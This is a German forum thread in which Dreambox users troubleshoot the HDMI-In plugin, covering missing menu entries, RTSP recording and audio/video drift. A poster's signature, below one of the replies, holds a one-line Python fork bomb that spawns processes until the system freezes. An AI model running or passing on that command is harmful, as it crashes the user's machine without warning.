HDMI Input Plugin

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Zeitumstellung gibt es ja derzeit keine. ;) Aber dem Hinweis mit dem HDMI-Kabel war zumindest einmal nachzugehen.

      Da es daran auch nicht liegt, bin ich jetzt erst einmal ratlos.


      Bis vor einigen Wochen ging bei mir HDMI-IN (Vers. 1.5) an der Dream7080HD problemlos. Ich hatte in der Favoritenliste den RTSP-Server und den HLS-Server, die ich per Fernbedienung anwählen konnte. Über WebIF habe ich dann (da ja kein EPG vorhanden ist) einen Timer gesetzt und den Dreambox-HDMI-IN über einen geeigneten Splitter mit wechselnden Quellen verbunden - und das seit Januar 2017.

      In den letzten Wochen gab es allerdings vermehrt Bildstörungen bzw. waren Bild und Ton nicht immer synchron. Zuerst schob ich es auf den Splitter - also neuen besorgt, doch das Problem bestand weiterhin.

      HDMI-Vers. 1.7 und 2.0 probiert - leider alles wie gehabt.


      Dann habe ich - nach einem halben Jahr kann man das ja mal machen - die Box neu geflasht mit Newnigma2-daily 2017-06-18.

      Jetzt habe ich keine Bildstörungen mehr, sondern gleich gar kein Bild mehr.

      HDMI-Vers. 1.4, 1.7 und 2.0 getestet. Über den RTSP-Server kommt nichts, ebensowenig über den Kanallisten-Eintrag HDMI-IN am Ende der Favoritenliste.

      Gehe ich per Fernbedienung über MENU/HDMI EINGANG dann habe ich zwar ein Bild, aber ich kann das Signal nicht aufzeichnen.
      Muss ich noch irgendwelche Einstellungen ändern oder wird das Ansteuern über die Kanalliste und damit das Aufzeichnen inzwischen unterbunden??

      Die Streaming-Server-Einstellungen sehen wie folgt aus:





      Sollten da irgendwelche Einstellungen verändert werden, wäre ich für Hinweise sehr dankbar.

      Gruß Philo :)
      Dreambox 7080 HD PVR mit WD40EURX AV-PG 4TB
      Dreambox 8000 HD PVR mit WD20EVDS Caviar AV-GP 2TB
      Dreambox 800 HD SE mit WD10TPVT Scorpio Blue 1TB
    • Inzwischen gibt es ein neues Problem. Der Eintrag unter MENU "HDMI Eingang" ist komplett verschwunden.
      Auch unter den Softwareaktualisierungen findet sich keinerlei enigma2-plugin-extensions-hdmi. Könnte ein Hardwarefehler vorliegen, d.h. könnte der HDMI-Eingang defekt sein?
      Dreambox 7080 HD PVR mit WD40EURX AV-PG 4TB
      Dreambox 8000 HD PVR mit WD20EVDS Caviar AV-GP 2TB
      Dreambox 800 HD SE mit WD10TPVT Scorpio Blue 1TB
    • Oh, sorry, dann habe ich mich vertan. enigma2-plugin-newnigma2-hdmi ist installiert, aber dennoch ist der Eintrag unter MENU "HDMI Eingang" verschwunden.

      Inzwischen habe ich noch einmal geflasht mit Newnigma2-daily 2017-06-18 und mit Newnigma2-daily 2017-06-21. In beiden Fällen ist komischerweise der "HDMI Eingang" trotzdem weg - trotz Neuflashen und ohne Wiederherstellung von Einstellungen etc - , aber seltsamerweise ist das HDMI-IN-Plugin von Gutemine immer noch auf der Box, obwohl ich es nicht installiert habe. Wie kann das denn sein, wenn man komplett neu flasht?
      Dreambox 7080 HD PVR mit WD40EURX AV-PG 4TB
      Dreambox 8000 HD PVR mit WD20EVDS Caviar AV-GP 2TB
      Dreambox 800 HD SE mit WD10TPVT Scorpio Blue 1TB
    • Vielleicht solltest du einfach damit aufhören wild und querbeet irgendwelche Sachen zu installieren. Von MEINEM Plugin ist immer nur die letzte Version unterstützt und das ist derzeit 2.1. Da der Kit und support Thread aber in OoZooN's board ist welches derzeit noch down ist wirst du dich gedulden müssen.
    • Ich sehe da als Datenquelle in den Streaming Server Einstellungen "Folge Live" und redest von hdmi-in und so richtig verstanden habe ich das nicht was du da machst.Hdmi-In ob von uns oder Gutemine ist doch primär das durchschleifen eines externen gerätes was am hdmi-in angeschlossen ist und das sollte gehen.Wenn du dieses über den streamingserver weiter streamen willst ist das eine andere geschichte aber mit deinen informationen ist das schwer ersichtlich
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hilfsbereit schrieb:

      ... verwirrt ihn doch nicht vollends. Entweder er nutzt jetzt das HDMI-In vom Feed oder deins. Ansonsten wird die Hilfe und der Support echt schwer ;)


      Danke Hilfsbereit. :) Ich glaube, man kann es ohnehin nie richtig machen. Sagt man einfach: Ich habe dieses Problem. PUNKT.

      Dann wird einem vorgeworfen, dass man sich gar nicht erst bemüht, selbst nach einer Lösung zu suchen.

      Versucht man durch Ausschlussverfahren herauszufinden, was funktioniert und was nicht, dann kriegt man Vorwürfe, man würde "wild und queerbeet irgendwas installieren".


      Ganz ehrlich: ich finde es extrem verwirrend, was da tatsächlich was ist.

      Ich dachte, dass nach Flashen des Newnigma-Images mit dem entsprechenden enigma2-plugin-newnigma2-hdmi im MENU "HDMI Eingang" erscheint. Und ehrlich gesagt, weiß ich auch nicht, was unter Erweiterungen oder im Plugin-Browser nun dazu gehört und was zum HDMI-IN-Plugin gehört.



      gutemine schrieb:

      Vielleicht solltest du einfach damit aufhören wild und querbeet irgendwelche Sachen zu installieren. Von MEINEM Plugin ist immer nur die letzte Version unterstützt und das ist derzeit 2.1. Da der Kit und support Thread aber in OoZooN's board ist welches derzeit noch down ist wirst du dich gedulden müssen.


      Wie Du richtig sagst, ist das OoZooN's board down - dort wollte ich in der Tat die neueste Version herunterladen, testen und gebenenfalls um Hilfe bitten. Dass das Board nicht erreichbar ist, dafür kann ich wohl nichts!


      Im übrigen kann ich - wenn das board down ist - ja auch nicht wissen, dass Vers. 2.0 nicht die neueste Version ist, oder? Vers. 2.0 konnte ich nämlich aus einem anderen Board herunterladen, wo von Vers. 2.1 auch nicht die Rede war.

      Also verzeih, wenn ich so unwissend bin - und ich hilfesuchend in diesem Forum nachgefragt habe. Der Thread wurde auch nicht von mir eröffnet. Es hätte ja sein können, dass hier auch jemand weiterhilft. Oder ist das so vermessen, JETZT eine Lösung zu suchen, wo ich gerade in dieser Woche sehr viel Zeit habe, um mich damit zu beschäftigen??

      In diesem Sinne bedanke ich mich bei Dir für die Information, dass Vers. 2.1 die neueste ist.


      kati910 schrieb:

      Ich sehe da als Datenquelle in den Streaming Server Einstellungen "Folge Live" und redest von hdmi-in und so richtig verstanden habe ich das nicht was du da machst.Hdmi-In ob von uns oder Gutemine ist doch primär das durchschleifen eines externen gerätes was am hdmi-in angeschlossen ist und das sollte gehen.Wenn du dieses über den streamingserver weiter streamen willst ist das eine andere geschichte aber mit deinen informationen ist das schwer ersichtlich

      Hallo Kati, danke für Deine Antwort. Ja, Du fragst das richtig: was mache ich da? Die schlichte Antwort: eigentlich habe ich nichts gemacht. In den Streaming Server Einstellungen war "Folge Live" eingestellt, d.h. ich habe nichts verändert.

      Was ich machen WILL bzw. bisher gemacht hatte, war folgendes:

      - Erstmalig habe ich im Jan. 2017 HDMI-IN-Plugin 1.7 installiert - dabei wurden automatisch in den Favoritenlisten Einträge erzeugt:

      Streaming Server RTSP
      Streaming Server HLS

      - Leider verursachte Vers. 1.7 sehr starke Tonprobleme, wenn ich wieder auf einen SAT-Kanal umschaltete, so dass jedesmal ein Reboot der Box nötig war, weshalb ich dann die frühere Vers. 1.5 installierte.
      - Außer die Streamserver einzuschalten, habe ich nach meiner Erinnerung damals gar nichts gemacht. Ob damals auch "Folge Live" eingestellt war, kann ich nicht mehr sagen.
      - Ich habe am HDMI-Eingang verschiedene Quellen angeschlossen und über das WebIF Timer gesetzt für den Streaming Server RTSP.
      - Aktualisiert hatte ich das Plugin nie, weil ich immer nach dem Prinzip verfahre: Never change a running system.

      Und das ging problemlos bis vor wenigen Wochen, als Bildstörungen aufkamen (Splitter und HDMI-Kabel wurden testweise ausgetauscht, hat aber nichts gebracht).

      Da ich mich nun nicht so gut auskenne, was da wo wie eingestellt werden muss, wollte ich einfach nachfragen, ob in den Einstellungen ein Fehler vorliegt, weil es jetzt eben auch mit Vers. 2.0 gar nicht gehen will.

      Nach Deinem Hinweis habe ich "Folge Live" in "HDMI-Input" geändert - leider ohne Erfolg.

      Gruß Philo :)
      Dreambox 7080 HD PVR mit WD40EURX AV-PG 4TB
      Dreambox 8000 HD PVR mit WD20EVDS Caviar AV-GP 2TB
      Dreambox 800 HD SE mit WD10TPVT Scorpio Blue 1TB
    • Philomathia schrieb:

      Bis vor einigen Wochen ging bei mir HDMI-IN (Vers. 1.5) an der Dream7080HD problemlos. Ich hatte in der Favoritenliste den RTSP-Server und den HLS-Server, die ich per Fernbedienung anwählen konnte. Über WebIF habe ich dann (da ja kein EPG vorhanden ist) einen Timer gesetzt und den Dreambox-HDMI-IN über einen geeigneten Splitter mit wechselnden Quellen verbunden - und das seit Januar 2017.

      In den letzten Wochen gab es allerdings vermehrt Bildstörungen bzw. waren Bild und Ton nicht immer synchron. Zuerst schob ich es auf den Splitter - also neuen besorgt, doch das Problem bestand weiterhin.
      dito
      nutze Newnigma HDMI-In-Plugin, HDMI-Switch, verschiedene Quellen
      erst sind Bild und Ton synchron, Ton läuft aber wohl einen Tick schneller als Bild, daher verstärkt sich die Asynchronität im Laufe der Zeit immer mehr
      manchmal hab ich schon beim Start ne Mickey-Maus-Stimme 8o - spricht ja auch für einen zu schnellen Ton, oder?
      an den TV angeschlossen ist alles synchron

      kann ja auch mal meine Einstellungen posten



      wüsste jetzt auch nicht, was da faul ist

      habs jedenfalls mal geloggt




      sorry, hab die Advanced Audio Settings vergessen



      kann man da AC3-Verzögerung verändern, dass der Ton synchron läuft?

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Dream0401 ()

    • kati910 schrieb:

      Wir machen nur die umschaltung auf den hdmi input.
      soll heißen?
      falscher Thread oder kein Support für RTSP???

      im Augenblick wäre ich schon froh, ausschließen zu können, dass die Box kein CPU- oder RAM-Problem hat
      vielleicht gibt's dafür Unterstützung?
    • soll wohl heißen, das NN2 Team sorgt zwar dafür, dass du HDMI-In überhaupt nutzen und etwas anschließen kannst, aber nicht um die boxinterne Verarbeitung des Signals. So wie ich das verstanden habe, gibt es ja 2 HDMI-In plugins. Eines hier zum Image und eines von gutemine. Vielleicht kannst du ja im oozoon-Board in Thread zu seinem HDMI-IN plugin, mal nachfragen ;) .
    • Hilfsbereit schrieb:

      soll wohl heißen, das NN2 Team sorgt zwar dafür, dass du HDMI-In überhaupt nutzen und etwas anschließen kannst, aber nicht um die boxinterne Verarbeitung des Signals. So wie ich das verstanden habe, gibt es ja 2 HDMI-In plugins. Eines hier zum Image und eines von gutemine. Vielleicht kannst du ja im oozoon-Board in Thread zu seinem HDMI-IN plugin, mal nachfragen ;) .
      ah, verstehe
      danke Dir!! :thumbsup:
      dann werde ich da mal weiterschaun
    • yep, werde ich machen
      derzeit ist keine Anmeldung möglich, das board ist wegen Umzugs geschlossen

      ich habe auch k.A., wo der Unterschied liegen könnte
      immerhin kann ich über den RTSP-Stream die angeschlossene HDMI-Quelle sehen und aufnehmen, aber Bild und Ton laufen dann halt irgendwann auseinander
      warum die Video- und Audiosignale nicht richtig verarbeitet werden, weiß ich ja nicht - es hat ja lange Zeit problemlos gefunzt

      Sorge macht mir, dass die Hardware einen Defekt haben könnte, dass CPU bzw. RAM überfordert sein könnte(n)
    • ... erreichbar ist das Board schon, ich kann es jedenfalls ansurfen und mich anmelden. Kann aber wirklich sein mit dem registrieren, da die auch gerade ihre Bordsoftware umgestellt haben.

      aber @gutemine liest ja hier mit, vielleicht kann er mehr zu dem Thema sagen. Jedes mal wenn ich ihn in einem Post erwähne, ist das wie ein Lockruf für ihn :D

      hier mal der Link direkt zum oozoon-Thread
      oozoon-board.de/wcf/forum/inde…input-plugin-for-dreamos/
    • Hilfsbereit schrieb:

      ... erreichbar ist das Board schon, ich kann es jedenfalls ansurfen und mich anmelden. Kann aber wirklich sein mit dem registrieren, da die auch gerade ihre Bordsoftware umgestellt haben.

      aber @gutemine liest ja hier mit, vielleicht kann er mehr zu dem Thema sagen. Jedes mal wenn ich ihn in einem Post erwähne, ist das wie ein Lockruf für ihn :D

      hier mal der Link direkt zum oozoon-Thread
      oozoon-board.de/wcf/forum/inde…input-plugin-for-dreamos/
      ok, danke :blumen:
      registriert bin ich jetzt
      jetzt muss ich erst mal das plugin installieren und testen
      vielleicht habe ich ja Glück und es läuft dann ;)
    • Jetzt bin ich etwas durcheinander. Anscheiend gibts zwei Plugins für den HDMI Input. Mit dem einen kann man den Stream aufnehmen und mit dem anderen nicht. Soweit richtig? :)

      In der Paketverwaltung ist jetzt nur ein Plugin, mit dem ich nicht aufnehmen kann. Ist das richtig?